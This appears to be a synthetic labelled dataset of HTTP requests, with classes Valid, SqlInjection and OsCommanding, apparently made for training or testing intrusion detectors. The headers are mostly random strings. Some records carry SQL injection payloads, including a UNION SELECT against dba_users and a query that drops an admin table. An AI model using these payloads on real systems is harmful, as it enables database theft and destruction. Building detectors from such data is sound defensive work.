X-Serial-Number: 1437240806
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15928
Start - Id: 5806
class: Valid
PUT /a33oqSvh/qkemepeenwoa/onnigptctca/hpyGULXN_SNt2D-SiBH/nm/ximgc/aenN6CvJtcl/ex5hinelhhgbtd/rM_bbKUe/30SHsV7a3khN/pO5erEexqsrf/hMinhesdlorso.pl? HTTP/1.1
Content-Length: 139
Content-Language: f,teadte,5bp
Content-Encoding: identity
Content-Location: http://uI009.it/ptntsa/eoeh/Maokfcd.asp
Content-MD5: aWlhM2VhdW5lTXllYWVubw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Jan 08 07:42:40 UTC
Last-Modified: Thu, 29 Dec 05 20:09:58 GMT
Host: www.qmILe.gov
Connection: es2a
Accept: application/zip;q=0.9, image/gif
Accept-Charset: euc-tw, shift_jis;q=0.7, x-mac-turkish;q=0.2, iso-2022-kr;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 42.172.144.34
Cookie: Ol=nbaypiihT;gmwsiArueie=6145390;FtsvfmetavEi=ecNeg;nprocessing-instructionz@z=d8Rd;nnmau=okthalolog|cd6)e=
Cookie2: $Version="558"
Date: Sat, 07 Jul 07 12:32:05 CET
ETag: W/"uwVaep9pp@bk-EHfUy__"
Expect: nel1=yoolom
From: s8eohuh@Trune.de
If-Modified-Since: Sun, 04 Jan 04 05:01:28 UTC
If-Unmodified-Since: Tue, 02 Dec 08 14:51:43 GMT
If-Match: "_4mr6jC06rcjT7kSD"
If-None-Match: "X0skp2DqxUWIK8Mn"
If-Range: Wed, 11 Oct 06 24:53:37 GMT
Max-Forwards: 1813
MIME-Version: 2.7
Pragma: timcpeex='dttheKt'
Proxy-Authorization: Basic dXBuY3VkOmhzMW9v
Authorization: NTLM ZXMwb2V0dG9mZHNlbG5uYXRnYWFhdXNlbWVhdW9sc2Vhbg==
Range: 741779-46
Referer: /Oats9/bseJi/rjrUan/htea/ih6a.asmx
TE: deflate;q=0.0,trailers
Trailer: Upgrade
User-Agent: nvptskn7hgy
UA-CPU: MIPS
UA-Disp: 746,8790,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1021x7299
Via: 9.8 www.pllNah.jpeg, HTTP/3.5 www.cnelme.gif, HTTP/9.3 www.RPrTLs.png
Transfer-Encoding: gzip
Upgrade: 1io/8.4, at7e/6.8
Warning: 057 www.Erpswu.tiff:80 "ws9y7tenxlrelypsyt" "Sun, 03 Sep 06 19:18:45 UTC"
X-Forwarded-For: 128.88.36.141
X-Serial-Number: 8692230651
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

s8ntt=Htim3hs&inmsnmlenChnlcz=yopenSin$tbody&sp5eocSdOjoeelc=heR5wuo1rqtezSjnos&ohxaccess_log=fh2qRdD_&8htar=mzguXl65&u6yizhrneO52tq=5472

End - Id: 5806
Start - Id: 33326
class: Valid
PUT /s-QmlWYxGcxez74nISU/1srsratydetewtt/nc/Gbinm8cX275/o4ndTMlBodRvt3GMwWW/trT9.6rUPNAD/ioYdtranioinb8tcUii/9ivafis52sotgE/csgnNhdxu/pbowso6trarniap/ny@H/en9r.shtml? HTTP/1.0
Content-Length: 313
Content-Language: 8,a
Content-Encoding: compress
Content-Location: /inthso/pdet/ghfaHhei/i3eu1dan.mpeg
Content-MD5: YXRJbkQ0YTR0b3J3ZW1tdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Mar 06 02:19:25 GMT
Last-Modified: Fri, 10 Jun 05 19:33:43 CET
Host: 75.93.15.37
Connection: srettgae
Accept: */*
Accept-Charset: x-mac-arabic;q=0.4, x-mac-korean;q=0.5, x-mac-greek;q=0.3, utf-7;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=08
Client-ip: 216.161.7.224
Cookie: sidie=odry6b40W);pvgtiTy=srk
Cookie2: $Version="687"
Date: Sun, 17 May 09 12:24:49 UTC
ETag: W/"aYE2lX5JEkSIDDOqg1n"
Expect: hTuga
From: rcidi8@tsUeIwinez.net
If-Modified-Since: Mon, 25 Apr 05 12:28:31 CET
If-Unmodified-Since: Sun, 23 May 04 16:49:44 CET
If-Match: "Dvq1Cc.ZvIa1qWkeBxg"
If-None-Match: "F8pJ42wCLuI91eGMUO"
If-Range: "nOonB4906D@0Hfvpea1"
Max-Forwards: 8669
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest response="82Aefeab6F6E793D521a04Cc9Ec2D0A4"
Authorization: Basic cjRBc29ueDpuZHRs
Range: -608
Referer: /ivtsreae/oettri.msf
TE: deflate
Trailer: User-Agent
User-Agent: Mozilla/8.2 (Windows; U; Win98 1.1; Si-lD; rv:1.0.9) Gecko/45727541
UA-CPU: StrongARM
UA-Disp: 6610,281,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1181x772
Via: iehn0/9.7 www.trnoob.jpeg, 7.9 50.82.126.213
Transfer-Encoding: compress
Upgrade: erraNN/6.8, erpl/9.7
Warning: 225 8.156.160.60 "gIs0jtndnqerEqatp" 
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 6047064936
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~

rrlnldthctoqy=enO4V2&Ws1nullY=23321&7tdaEraa8gojecs=eatelnetb&s5eurfsareEte=oserEslgksw&zadminKWR4exec=0a&teauhr8scnwidpi=78&f4otjeowCyrfwa=dnttEollOeiyP&n2aeupyloo=e&ahjh7VPeeSoleSo=498492&stla0he=aoE'w%Es rlmnn9&utoafhi8ginnuit=o3HAp1ivE60F&neeydunaresq=sNgon%pN&autoexecftpRq=rd-:7bg&t7i7yedasbo=813260

End - Id: 33326
Start - Id: 32581
class: Valid
POST /ncFo/eUrs/wnz@SOx4WD40EW.vjMX/hNKa5lY.CyExaRI@6gl0/nzyittoiDaelasmscRno.php3? HTTP/1.0
Content-Length: 133
Content-Language: raholl,amt
Content-Encoding: identity
Content-Location: /ehnmii/la6irhdp/lmezk/evEor0ah/dtbrs.swf
Content-MD5: ZGd3N2V6ZXQ5cmV1bG5pYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Feb 07 06:30:38 CET
Last-Modified: Tue, 20 Apr 04 02:18:03 GMT
Host: www.ntnTa.de:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 87.137.200.16
Cookie: 8ne=3382;2oGf=i7iEvhtisr;fuiemiTeisn=827;renasAOspe=]2heheLobject9aLftEe;aeIpsj=3099;uUxhXEj=348788552
Cookie2: $Version="79"
Date: Sun, 18 Jan 09 16:31:49 GMT
ETag: "_WNbGZ.fa@5AS4ZLGGuA"
Expect: 100-continue
If-Modified-Since: Mon, 22 May 06 01:07:52 UTC
If-Unmodified-Since: Thu, 17 Jul 08 02:14:52 UTC
If-Match: "f0hLe7-ogyXH5gheghu"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 1.6
Pragma: n=r
Proxy-Authorization: elil qeNA=drrh
Authorization: Digest response="44737fC6ccBe45A92d8b2b785eaBe2a9"
Range: -619576,782-7
Referer: /pjd0ua/lh43enG/msA0.fgf
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: Amaf7p (iWutEI; g1nVzvrEa; a9TG4MRht; lVDqQPG; iooyG1)
UA-CPU: Sparc
UA-Disp: 282,0738,8
UA-OS: Windows NT
UA-Pixels: 744x9728
Via: FTP/8.6 www.ewre.shtml, FTP/9.2 www.fnCwo.htm, FTP/7.7 86.146.234.33
Transfer-Encoding: deflate
Upgrade: nnoe/1.0, egmq/7.4, 9prh/1.1, eArAyt/8.4
Warning: 414 www.ihqtarr.htm "jOtricomadt8tg" 
X-Forwarded-For: 215.81.0.154
X-Serial-Number: 34552
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

r4eioErokycykn3=ufhavinglog&2eaOeiurciZ= hu<Iopt&VlswgetmnBL=rar  adestdintObr&edtiexlapee7e=u8aa3UStpu&.zyDaccess_logHkwherec=4607

End - Id: 32581
Start - Id: 28049
class: Valid
GET /rsWrV/t-x-NbOwoZj8RVNH/XgMhQMUYWrKQ4W0/oltlothtaept/namn/zWlikeFIOAARpsQ.js?fkftahAt5iu=55020&eidrtSa=xxhen&yeeservices=936187&lza93ed=37129821&9sarnnhl1cucdr=h0y2elogenpasees&paGq=4&MiTzO9UhEGi2=ygss6yoynLtosxtermx&leoiTUqwn0=oadtmgb%29hhinl%3Fa&ssiedoth9nradti=5554&EZjZubdlikexp_F_=ewnqsleTtyFnfrWlrr&aiEaxai8Dn2cotT=e%2B&hjihbmeyeiat8it=34099&@7uXkupdate4igroup by=fa&fUGW6PyIg=ns&pcgientLulor00a=zgsHzbrynotcb HTTP/1.0
Host: 122.138.226.37:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253;q=0.5, windows-874;q=0.1, iso-2022-kr, iso-8859-2;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: heRmhFee-HuI, si6Tr-RuAnemht;q=0.3, eoeedno-etrvoo;q=0.2
Cache-Control: no-transform
Client-ip: 218.33.30.72
Cookie: slrsnoichav6deT=sprocessing-instruction;RcSenonmane=2817
Cookie2: $Version="13"
Date: Wed, 13 Jul 05 05:10:41 UTC
ETag: "LEbCqMcm.Ek_Hit"
Expect: jbdp
From: gu9cDaia@ar6it9.st
If-Modified-Since: Thu, 11 Feb 10 06:00:43 UTC
If-Unmodified-Since: Sun, 13 Sep 09 24:07:03 UTC
If-Match: *
If-None-Match: "czKW1fG8XNrQ.2wRcklo"
If-Range: Fri, 28 May 04 19:55:07 UTC
Max-Forwards: 0122
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic Yjllbndob2w6dHIxcmU=
Authorization: Basic c2lTZTp0b3VhbnI=
Range: -570
Referer: /wstws/ncbsmp/teigE.doc
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.5 (X11; U; Open BSD i586 6.2; je-bt; rv:4.6.3) Gecko/79965738
UA-CPU: Sparc
UA-Disp: 352,634,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4477x7117
Via: 8.7 www.dv6nhhS.css, HTTP/3.9 170.182.200.224
Transfer-Encoding: deflate
Upgrade: oe2lo1/5.5, meme/3.9, dxyas/2.0
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 140.27.28.161
X-Serial-Number: 981815102258
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28049
Start - Id: 12759
class: Valid
GET /h9where6_6p/npp/ilisflo/79afFhE35er/cuVXxHTENGB-x/eb0pmm0irAf/jebi3JwsD0e_zT.css?Wo8sZhtuaoo=v+%24deleted&imwmMlvhmoeul=2817584986&paede=h-22&sf6=eobjecte&tpcenVaU=32275&rehuiae=uL8EY8BQ&eiewiulet=phpEnt&brlpor3drisc=11 HTTP/1.1
Host: 238.102.216.241:425
Connection: keep-alive
Accept: application/zip, audio/basic
Accept-Charset: euc-tw, iso-8859-15, us-ascii
Accept-Encoding: *;q=0.3
Accept-Language: de-ta, D9hsod-eoet;q=0.0, Onys-sjn;q=0.4
Cache-Control: only-if-cached
Client-ip: 4.223.155.209
Cookie: owguebg7=131mpbexec| rtelnetn+]s;getaitanureehto=I9o4slthexecposition<1grw[oeul
Cookie2: $Version="3"
Date: Fri, 11 Nov 05 02:53:55 GMT
ETag: W/"7UpOQ9pxCWpDd78BH5XA"
Expect: 100-continue
From: ahe6lcme@tscunoU.st
If-Modified-Since: Sun, 25 Oct 09 18:45:04 CET
If-Unmodified-Since: Tue, 16 Oct 07 02:39:56 CET
If-Match: *
If-None-Match: "t13gmVtvWO@GOAn"
If-Range: "7rL4SKBUx6Aw5hLJ7kIA"
Max-Forwards: 95
MIME-Version: 7.6
Pragma: tEtn='zKlr'
Proxy-Authorization: eqxrte snsH=briit
Authorization: Digest nonce
Range: 23407-76
Referer: /dteemQod/duoEmcfb/d1ujytle/3Dre6ts/imee.pl
TE: trailers
Trailer: If-Modified-Since
User-Agent: xLi6Kb http://www.ihemnoKa.biz
UA-CPU: MIPS
UA-Disp: 8183,952,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6833x519
Via: HTTP/3.1 182.89.231.0, 9.2 11.186.89.24, 4.6 www.rsOomg.jpg
Transfer-Encoding: deflate
Upgrade: al9/4.2, fue/6.6
Warning: 595 www.sEdyesc.html:10 "ssEsgqu" "Mon, 08 Sep 08 09:37:27 CET"
X-Forwarded-For: 186.146.163.150
X-Serial-Number: 66246
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12759
Start - Id: 42083
class: SqlInjection
GET /6vgp-S2KE.HI/zYVFH/irnmnot/te7-Ixpv5Bs.exe?s1t9ahnnO=chairs%27++++UN%2F**%2FION+++++SEL%2F**%2FECT++++TETardbnt+++++FROM++dba_users+++++WHERE+fistoeAd+++++like+++%27%2525&yntr5chuti5yi2=3guE%40G HTTP/1.1
Host: 209.151.98.163
Connection: pfewyeoL
Accept: video/*, audio/x-wav;q=0.9, text/plain;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 234.253.45.250
Cookie: al=xgna6@%7 ;ploJa0yjHr=lsj T;iEbrrrio=hT l;lsaiw3d5=45092
Cookie2: $Version="719"
Date: Sun, 18 May 08 02:01:36 GMT
ETag: "m0e.RyTZWMInQHe"
Expect: 100-continue
From: amm24r@w2uiwd.st
If-Modified-Since: Fri, 31 Dec 04 14:30:27 CET
If-Unmodified-Since: Tue, 11 Mar 08 20:23:34 GMT
If-Match: *
If-None-Match: "naiGB7WP4dq_G622"
If-Range: Sat, 26 Jul 08 01:22:03 CET
Max-Forwards: 0
MIME-Version: 0.9
Pragma: s3l6fqGs=t
Proxy-Authorization: tczen owIa=t6tjeTgW
Authorization: Basic ZW5oYzpkb2xlZWVh
Range: -951
Referer: /sknno/teuos/hTicka/ain8Rt/e6i3mtwm.jsp
TE: deflate;q=0.0,trailers
Trailer: User-Agent
User-Agent: fweesnD6
UA-CPU: x86
UA-Disp: 7502,392,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 861x9768
Via: 7.4 www.trrsilt.gif, 9.3 www.cIefl.jpeg:40
Transfer-Encoding: deflate
Upgrade: uose/3.2, vzaeDe/0.5, 0rrE/2.7, gnnk/0.3, seow/3.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42083
Start - Id: 16206
class: Valid
GET /ll/imiay7ttona/vUmPIM9/b2/logpozLennyesommbj/pwdwsseQEdx/t4_/rUPRJ0a5cvPL5O60vI/ouhU.js? HTTP/1.1
Host: 27.178.64.252
Connection: sAtK
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: akenn-oyzegaut;q=0.2, aieniadu-yw;q=0.0
Cache-Control: min-fresh=838
Client-ip: 229.117.141.9
Cookie: U7hEfvbscriptB=dgcs2dttetx2
Cookie2: $Version="531"
Date: Sat, 29 Apr 06 01:57:13 GMT
ETag: W/"@SJXhmTT2SU4I70"
Expect: yDauetm=remI
From: oltae@ieknifNr4.org
If-Modified-Since: Fri, 01 Feb 08 12:57:22 UTC
If-Unmodified-Since: Sat, 30 Dec 06 21:16:30 CET
If-Match: *
If-None-Match: "AFdHk2KaCKZ1y6CzkQk3"
If-Range: Thu, 19 Mar 09 17:40:43 GMT
Max-Forwards: 16
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest qop=taoadOn
Authorization: Basic ZWF5eWVUZWg6b0Vhc3c=
Range: 14337-
Referer: http://www.dig5ioi.uk/gn0su3.tiff
TE: chunked,trailers
Trailer: Max-Forwards
User-Agent: eoVJju9 http://www.Momli28.it
UA-CPU: PowerPC
UA-Disp: 202,714,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 846x8936
Via: HTTP/7.9 www.6eniefsn.html
Transfer-Encoding: deflate
Upgrade: tnl/8.4, hvmlz/2.3, sn2fh/0.4, tEir/3.1, eEcar/0.7
Warning: 562 www.72rhlemd.png "OanfqmoOtceaolig" 
X-Forwarded-For: 113.16.19.192
X-Serial-Number: 1816915028
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16206
Start - Id: 14238
class: Valid
GET /nti5rkgTiyb6QU.png? HTTP/1.1
Host: 202.3.5.24
Connection: eie1
Accept: */*;q=0.6
Accept-Charset: koi8
Accept-Encoding: deflate, compress
Accept-Language: *;q=0.7
Cache-Control: max-age=708
Client-ip: 11.66.68.248
Cookie: optSGnetcatprocessing-instruction3TwnJGT=3A3|x;le3EeH=56010;eqftpj-PG=hol;peHlrd=gehgeh %etcallnph-we
Cookie2: $Version="64"
Date: Thu, 11 Sep 08 01:52:30 GMT
ETag: W/"AeZN8RZMmoUH4hCBsnaF"
Expect: 100-continue
From: faeootnr@3EygNeo.st
If-Modified-Since: Sat, 01 Aug 09 02:01:32 GMT
If-Unmodified-Since: Mon, 10 Jan 05 01:57:59 UTC
If-Match: "Rp@wzx4l9NMXHS3A@"
If-None-Match: "s60cuC287BQhojTh@j"
If-Range: "ZezdhGqkNBf3Ryt."
Max-Forwards: 487
MIME-Version: 0.5
Pragma: ls=tfeytr
Proxy-Authorization: NPoh rEbi=eefingh
Authorization: guE3t xeaAs=Gwupanfp
Range: -6,-02857
Referer: http://www.immd.fr/zeqq/epdtwin.mp3
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.0 (Windows; U; WinNT 4.1; 2e-xn; rv:7.3.9) Gecko/60415670
UA-CPU: MIPS
UA-Disp: 985,925,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 962x171
Via: cyAc/4.5 73.251.135.175:0711, 8.7 www.EedsQ.htm
Transfer-Encoding: compress
Upgrade: cuWv/5.1, Damt/8.7, nbrs3r/2.2, tiufr/9.4
Warning: 616 154.56.254.74 "ansu3dtaabmzoDoqtefe" 
X-Forwarded-For: 177.22.102.112
X-Serial-Number: 21052565504410930240
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14238
Start - Id: 41190
class: SqlInjection
GET /3YNrXPvgvqphplsK/hos1zohKJ4exsdZjS5/2Udq7pogintt9wimt/g06CRfupdate/ten6nensah6h/vwuhjPbMp5yB3/nelwcTado5hsrhiLi8ac/ti4siS6UnqbLp@MzLVP8/Qt6p/xNaT6qMU7ws9Tu.9QSJz/f76wboot.iniBf1UZP3lRO.exe? HTTP/1.1
Host: www.ihss9woft.ch:393
Connection: keep-alive
Accept: text/*;q=0.0, image/*;q=0.6
Accept-Charset: euc-kr, x-mac-arabic;q=0.6
Accept-Encoding: ' OR   'l0bcaawue' BETWEEN     'R'     AND    'T
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 151.63.160.140
Cookie: oa2=taedYyG;et8axee=rm3&hifrtchildmnidet7;um8eeseKhnoacs0=482301464;B@jMZai=387197
Cookie2: $Version="3"
Date: Wed, 18 Feb 09 16:28:24 UTC
ETag: "ThY1cTTEqxmOVuYl"
Expect: o7e4
From: hnrnbiad@nJninesrqA.biz
If-Modified-Since: Mon, 11 Feb 08 05:18:18 GMT
If-Unmodified-Since: Mon, 23 Feb 04 23:48:26 CET
If-Match: *
If-None-Match: "ceix1PT.YXfQIG7"
If-Range: *
Max-Forwards: 47
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: Basic MWl0aWE6MGw0dGNhdA==
Range: 0731-3915
Referer: http://irrn.com/zisp/athogxn2/agtmot.jpeg
TE: trailers
Trailer: Date
User-Agent: iasto/1.1.5
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9560x6945
Via: FTP/8.5 233.75.215.126
Transfer-Encoding: identity
Upgrade: eijtn/6.7, lQnT/6.1, aomess/4.2, rhpltp/2.7
Warning: 985 www.enaw.tiff "drga" "Tue, 12 Feb 08 13:07:34 CET"
X-Forwarded-For: 247.67.228.93
X-Serial-Number: 7584461693588
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41190
Start - Id: 42674
class: SqlInjection
GET /e@/txqD/M7xU-YfN08wMNY7/7gjbwget/oEBjzLxHt0fx/as0CeDo.dll?teuG=oaZiTr41YH&fgwp-4sO_2Xwhere=0421350873&deragqsei=5f&Ojtjv_LI=%27%3B++++drop+++++table++++admin&89bX-7qI0ap=oacara1ey4w&reSncashI=tq&dseitendmlroio=4h28eAufsnh&7n9f_Ch=yj2ralwm HTTP/1.0
Host: www.orxthb10.uk
Connection: otds
Accept: video/*, text/*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: he='eEipnsln'
Client-ip: 29.149.61.93
Cookie: YpildrbToz=sks;unh=uti;ieTflia6N=hEMnZmRu;ll=mbf1XDzJc;9trnaehefkros=03
Cookie2: $Version="0"
Date: Sun, 28 Oct 07 08:39:19 GMT
ETag: "ZrRp2eug-ZzMMIJybKLT"
Expect: itee
From: cil0mei@xdsw.org
If-Modified-Since: Thu, 08 Nov 07 13:25:01 UTC
If-Unmodified-Since: Fri, 23 Feb 07 15:18:07 UTC
If-Match: "fuB2h0wHx7gC9AjbvBG"
If-None-Match: "mgM3YBhDL8pYO.wlO"
If-Range: "smnc27za56MrM8nmBam"
Max-Forwards: 7
MIME-Version: 5.1
Pragma: eaayt='ig7minY'
Proxy-Authorization: NTLM cmNva2FvcHNvaXdsbmVlYWVpaGV5dG1tcm1yb2g2bnRlMXJzc2pyZTk3
Authorization: Basic bGRuaXNhYVY6cmxUYw==
Range: 73002-0
Referer: /To9onSjt/ro7i3d.asmx
TE: chunked;q=0.0,chunked,trailers
Trailer: Accept
User-Agent: Mozilla/0.5 (Windows; U; Win 9x 6.3; ni-Fw; rv:3.8.3) Gecko/74432774
UA-CPU: PowerPC
UA-Disp: 414,7114,8
UA-OS: Windows 98
UA-Color: color32
Via: FTP/7.9 www.amrr.gif:21388
Transfer-Encoding: gzip
Upgrade: eeog/2.4, mitts/3.0, e6e3i/4.3, oaelt/5.7, heNtCn/4.2
Warning: 189 97.161.249.166 "Orce4" "Fri, 08 Sep 06 07:10:49 GMT"
X-Forwarded-For: 113.84.223.129
X-Serial-Number: 732852130807
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42674
Start - Id: 16048
class: Valid
GET /ln4by/a016.js?u7e5eyd=7788&ooh1sqm=21578&db7o=r2NHb&qaeDht9r2Peatot=963123&raeMsueSsr=d&dy8pb=eo3eonr&ls=fu7lsx&g3yiMtayS=tTorn&peimbiduexae=03&tineNzLiTtn7laD=3&feIRMfvar7rqR=a&un3cfue=o%40cmd&h55wxechoDXo=b75mRvp7d%40rG&Ptlmih2BYprnoai=ns HTTP/1.1
Host: www.tAfjtstW.org
Connection: close
Accept: application/zip, audio/*, image/*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 124.71.218.216
Cookie: l8wgetBdUSopeniexecb=63651255
Cookie2: $Version="71"
Date: Sun, 10 Dec 06 21:12:17 GMT
ETag: "Z5gkMjZc.n_FexmfUp"
Expect: 100-continue
From: nsodrd@t9uule.biz
If-Modified-Since: Thu, 25 Feb 10 11:24:45 CET
If-Unmodified-Since: Sat, 25 Oct 08 21:18:06 GMT
If-Match: "Pn2UlHe8NcUxXMN"
If-None-Match: *
If-Range: *
Max-Forwards: 5002
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="neh7g"
Authorization: Basic dGZmaW46d2NyaWRidA==
Range: -356
Referer: /soytEeze/PDsimr/hntd/egoegh/OghrEs.jpg
TE: trailers,deflate;q=0.0,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.2 (Windows; U; Win98 9.5; 0n-oa; rv:0.6.4) Gecko/27788315
UA-CPU: x86
UA-Disp: 738,0570,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0422x8842
Via: 5.8 0.123.112.30:1543
Transfer-Encoding: Anioo; eildxSc=dehnsrl
Upgrade: umjt/5.9
Warning: 293 www.aeei.tiff:0636 "t7sEtihfvebGdaitvu" 
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 0738318676103
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16048
Start - Id: 8897
class: Valid
GET /ftpJ8T.xfJS/kH/shwe/8goPlydCupp/caZUEpCoGiJDp1T_ZP/aaCIEkjPOpKI29npk.jpg?H4mmsBsbornttIU=65388566&_tFVO9SVNchild4v=017983&dzt=d&opt7pAsoq=%5Dedr%3BdadminedH%27o1sda&dtYcei1o=98&1ato=positionsnm5&hqlsc8wDrayr=58994&96nwsUo=alDepg%29+t9dlog&cloarva=uneis HTTP/1.0
Host: 224.49.154.93
Connection: 3mkhsse
Accept: image/png, image/*;q=0.6, image/*
Accept-Charset: euc-jp, koi8-r;q=0.5, euc-jp
Accept-Encoding: identity;q=0.4, compress;q=0.3
Accept-Language: *;q=0.6
Cache-Control: dae=n
Client-ip: 30.198.149.185
Cookie: 5zfphp84-3XOG-=tx@.iBC1eS;efsaeKolaldee2=home@oatposition et)eeao;0tTgrthuziopdt=vN
Cookie2: $Version="266"
Date: Sat, 02 Aug 08 03:50:36 UTC
ETag: "o_YERB0dpVOt2YXC"
Expect: 100-continue
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Wed, 06 Jun 07 19:04:32 GMT
If-Unmodified-Since: Tue, 16 May 06 12:58:00 UTC
If-Match: "mYnDiLwmFnwEgQQsf4k0"
If-None-Match: "zUMvyOal2w.VKQWg3KX"
If-Range: *
Max-Forwards: 9263
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic aXlla3RsOmdlZW1y
Authorization: NTLM Y2V1aHJuZWF0dDR1ZWV4dHRkaWpBbURzbW1odGlLb3phaW1qMXNneWxoMkVzWmVh
Range: 326-7
Referer: /non0s.exe
TE: trailers,trailers,gzip
Trailer: Accept
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 5.6; ir-aa; rv:8.3.5) Gecko/08532503
UA-CPU: Sparc
UA-Disp: 012,690,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 000x5970
Via: tevq/1.0 www.gioecao.html, 6.1 151.74.217.238
Transfer-Encoding: smude; ooia0n=otqtebwh
Upgrade: ne7b/6.5
Warning: 706 www.aaueje4a.jpeg "nuadttallasneoesa" 
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 266699
----: -------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 8897
Start - Id: 43032
class: OsCommanding
PUT /um@lrL0r1JMHHirAtZU/aD3YwLbCpO.js? HTTP/1.0
Content-Length: 111
Content-Language: theiiqe,fntnuyRy
Content-Encoding: gzip
Content-Location: /eecs/owily/m0sbyiA/tdrn.cgi
Content-MD5: dTBvRWlmd2FhczU0bHNoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 Feb 08 01:51:29 UTC
Last-Modified: Wed, 25 Nov 09 02:51:28 GMT
Host: 27.8.36.239
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-9;q=0.8, utf-7, us-ascii
Accept-Encoding: identity, gzip, identity;q=0.5, identity;q=0.0, identity
Accept-Language: *;q=0.3
Cache-Control: vdhtuUn='HeOe'
Client-ip: 65.119.102.85
Cookie: fhnzmldmaen9lfo=68;ai4aeha=eNaTifOUG;tFpr3s=bqapU\aaiWnhLid;Nhvo7nrnnhnt=k7.a5fj4sh4a
Cookie2: $Version="6"
Date: Wed, 10 Mar 10 09:51:04 CET
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: VsNdtdt@rdorILi.de
If-Modified-Since: Sun, 08 Feb 09 13:35:27 CET
If-Unmodified-Since: Mon, 07 May 07 24:31:59 CET
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: *
If-Range: Sat, 12 Jan 08 10:38:17 CET
Max-Forwards: 8
Pragma: bpHyiwu=rwt
Proxy-Authorization: NTLM eGV0aXNuc29ydXBqdERwdGVpU25vMHNhbGFvYmJiemFrT2NyYWVoZWhk
Authorization: Digest cnonce="uynuckdc"
Range: -98633,070828-,-9277
Referer: /e9mee/nnxuoh/Wfhnnra1/47ic/eeFnnlm.exe
TE: gzip;q=0.5,deflate
Trailer: Connection
User-Agent: Mozilla/8.1 (Machintosh; U; PPC Mac OS X 1.5; o1-4v; rv:8.7.5) Gecko/26304078
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 7.6 www.w8es.html
Transfer-Encoding: compress
Upgrade: 6CozN/5.3, aqmg/9.3, yryyou/0.4, eket/6.8, aiea/8.2
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
